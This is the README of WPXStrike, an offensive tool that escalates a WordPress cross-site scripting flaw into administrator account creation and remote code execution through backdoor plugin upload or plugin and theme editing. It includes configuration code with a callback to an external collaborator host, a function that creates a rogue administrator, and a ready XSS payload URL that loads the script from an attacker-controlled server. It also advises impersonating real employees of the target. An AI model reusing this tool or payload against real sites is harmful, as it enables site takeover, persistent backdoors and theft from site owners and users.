About • Key Features • How To Use • Examples • Contributing

WPXStrike is a script designed to escalate a Cross-Site Scripting (XSS) vulnerability to Remote Code Execution (RCE) or other's criticals vulnerabilities in WordPress.

⭐ This script provides support for Wordpress Versions 6.X.X, 5.X.X and 4.X.X. 🌟

• Privilege Escalation
  • Creates an user in WordPress.
• (RCE) Custom Plugin (backdoor) Upload
  • Upload your custom plugin (backdoor) to WordPress.
• (RCE) Built-In Plugin Edit
  • Edit a Built-In Plugins in WordPress.
• (RCE) Built-In Theme Edit
  • Edit a Built-In Themes in WordPress.
• (Custom) Custom Exploits
  • Custom Exploits for Third-Party WordPress Plugins/Themes.

1) Clone the Repository

git clone https://github.com/nowak0x01/WPXStrike

2) Edit the script by selecting the desired function, modifying its variable values and select the module. (Example: WPCreateAccount())

// ************************************ ~% Variables %~ ************************************ //

var Target = "https://wordpress.example.com/"; // Ex: https://172.16.0.13:8000/wordpress/
var Callback = "https://fqgx7638bcvddnsrufh3nxbozd.oastify.com/"; // Ex: https://collaborator.oastify.com/ (optional) (only if you want to receive feedback at each stage).

// ************************************ ~% Functions %~ ************************************ //

WPCreateAccount(); // (Privilege Escalation) - Creates an user in WordPress.
// WPUploadCustomPlugin(); // (RCE) - Upload your custom plugin (backdoor) to WordPress.
// WPEditPlugins(); // (RCE) - Edit a Built-In Plugins in WordPress.
// WPEditThemes(); // (RCE) - Edit a Built-In Themes in WordPress.
// CustomExploits(); // (Custom) - Custom Exploits for Third-Party WordPress Plugins/Themes.

function WPCreateAccount() {

    /* ************************************************************************************************************************************************ */
    var Username = "nowak";         // Ex: operator (It is recommended to use a valid employee name from the target company).
    var Password = `j^QEkyvd7*g3xqsE`;          // (weak password are allowed).
    var Email = "[email protected]";  // Ex: [email protected] (It is recommended to use a business email from the target company) (No email will be sent to the email address entered).
    var Role = "administrator";                 // Ex: administrator, editor, author, contributor, subscriber.
    var FirstName = ""; // (optional)
    var LastName = "";  // (optional)
    /* ************************************************************************************************************************************************ */

    // ************************************ ~% WPCreateAccount Modules %~ ************************************ //
    // [#] Choose one of the available modules [#] //
    WPXCreateAccount(); // Wordpress Create Account Module for Wordpress 6.X.X, 5.X.X and 4.X.X.
    /* ************************************************************************************************************************************************ */

    // Wordpress Create Account Module for Wordpress 6.X.X, 5.X.X and 4.X.X.
    function WPXCreateAccount() {
      ...
    }

3) Start a web server

php -S 0.0.0.0:80 -t .

4) Go to the WordPress XSS vector and include WPXStrike.js

https://wordpress.example.com/?search=<script%20src="https://YOURIP/WPXStrike.js"></script>

WPCreateAccount() - Creates an user in WordPress.

WPUploadCustomPlugin() - Upload your custom plugin (backdoor) to WordPress.

WPEditThemes() - Edit a Built-In Themes in WordPress.

WPEditPlugins() - Edit a Built-In Plugins in WordPress.

CustomExploits() - Custom Exploits for Third-Party WordPress Plugins/Themes.
// pending

If you're interested in contributing, enhancing the existing code, your efforts would be immensely appreciated. Your contributions will play a key role in making this project even better.

              ;,_            ,
                 _uP~"b          d"u,
                dP'   "b       ,d"  "o
               d"    , `b     d"'    "b
              l] [    " `l,  d"       lb
              Ol ?     "  "b`"=uoqo,_  "l
            ,dBb "b        "b,    `"~~TObup,_
          ,d" (db.`"         ""     "tbc,_ `~"Yuu,_
        .d" l`T'  '=                      ~     `""Yu,
      ,dO` gP,                           `u,   b,_  "b7         
     d?' ,d" l,                           `"b,_ `~b  "1
   ,8i' dl   `l                 ,ggQOV",dbgq,._"  `l  lb      WPXStrike (https://github.com/nowak0x01/WPXStrike)
  .df' (O,    "             ,ggQY"~  , @@@@@d"bd~  `b "1
 .df'   `"           -=@QgpOY""     (b  @@@@P db    `Lp"b,
.d(                  _               "ko "=d_,Q`  ,_  "  "b,
Ql         .         `"qo,._          "tQo,_`""bo ;tb,    `"b,
qQ         |L           ~"QQQgggc,_.,dObc,opooO  `"~~";.   __,7,
qp         t\io,_           `~"TOOggQV""""        _,dg,_ =PIQHib.
`qp        `Q["tQQQo,_                          ,pl{QOP"'   7AFR`
  `         `tb  '""tQQQg,_             p" "b   `       .;-.`Vl'
             "Yb      `"tQOOo,__    _,edb    ` .__   /`/'|  |b;=;.__
                           `"tQQQOOOOP""`"\QV;qQObob"`-._`\_~~-._
                                """"    ._        /   | |oP"\_   ~\ ~\_~\
                                        `~"\ic,qggddOOP"|  |  ~\   `\~-._
                                          ,qP`"""|"   | `\ `;   `\   `\
                               _        _,p"     |    |   `\`;    |    |
    @Author: Hudson Nowak      "boo,._dP"       `\_  `\    `\|   `\   ;
                                 `"7tY~'            `\  `\    `|_   |
                                                      `~\  |